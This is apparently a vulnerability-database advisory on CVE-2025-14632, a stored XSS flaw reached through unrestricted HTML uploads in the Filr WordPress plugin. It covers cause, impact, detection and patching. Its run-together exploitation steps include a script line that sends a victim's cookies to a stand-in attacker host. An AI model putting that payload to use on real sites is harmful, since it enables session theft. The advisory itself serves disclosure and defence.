
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-14632 is a Stored Cross-Site Scripting (XSS) vulnerability in the Filr – Secure document library plugin for WordPress, caused by unrestricted file upload in the FILR_Uploader class. All versions up to and including 1.2.11 are affected. The vulnerability was disclosed on January 16–17, 2026, with Wordfence as the reporting CNA. It carries a CVSS v3.1 base score of 4.4 (Medium) (Wordfence, NVD).
The root cause is classified as CWE-434 (Unrestricted Upload of File with Dangerous Type). The FILR_Uploader class in the plugin fails to enforce adequate file type restrictions, allowing authenticated users with Administrator-level access to upload malicious HTML files containing embedded JavaScript. When any user with appropriate permissions accesses the uploaded file (via a post of the filr post type), the JavaScript executes in their browser context, constituting a stored XSS attack. The vulnerable code is visible in the plugin's source at class-filr-uploader.php line 14 (WordPress Trac, Wordfence).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the browsers of users who access the maliciously uploaded file, potentially leading to session hijacking, credential theft, or unauthorized actions performed on behalf of the victim. The scope is marked as Changed, meaning the impact extends beyond the vulnerable component itself. Confidentiality and integrity are both assessed as Low impact, with no availability impact; however, chained with other vulnerabilities or in multi-tenant environments, the risk could be elevated (Wordfence).
Exploitation requires authenticated access at the Administrator level or above, significantly limiting the attack surface. The EPSS score is approximately 0.027%, indicating a very low probability of widespread exploitation in the near term. No evidence of in-the-wild exploitation, active exploit kits, or threat actor attribution has been reported. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Wordfence, NVD).
filr post type.<script>document.location='https://attacker.com/steal?c='+document.cookie;</script>.FILR_Uploader, the upload succeeds without rejection.filr post type entry that references the uploaded HTML file, making it accessible to target users..html files with embedded <script> tags in the WordPress uploads directory associated with the Filr plugin (e.g., wp-content/uploads/filr/ or similar)..html file from different user sessions..html file types appearing in the Filr document library that are not consistent with normal document types (PDF, DOCX, etc.).Users should update the Filr – Secure document library plugin to a version beyond 1.2.11 that includes the fix for file type restrictions. The patch is reflected in the plugin's trunk repository changeset (WordPress Changeset). As a temporary workaround, restrict Administrator-level access to trusted users only and audit existing uploaded files in the Filr library for suspicious HTML content. Site owners should also consider implementing a Web Application Firewall (WAF) rule to block HTML file uploads to the plugin's upload endpoint (Wordfence).
The vulnerability was reported and disclosed by Wordfence, a leading WordPress security firm, as part of their threat intelligence program. No significant broader media coverage or notable researcher commentary beyond the initial Wordfence advisory has been identified. The CVE record is noted as not being prioritized for NVD enrichment due to resource constraints (NVD).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."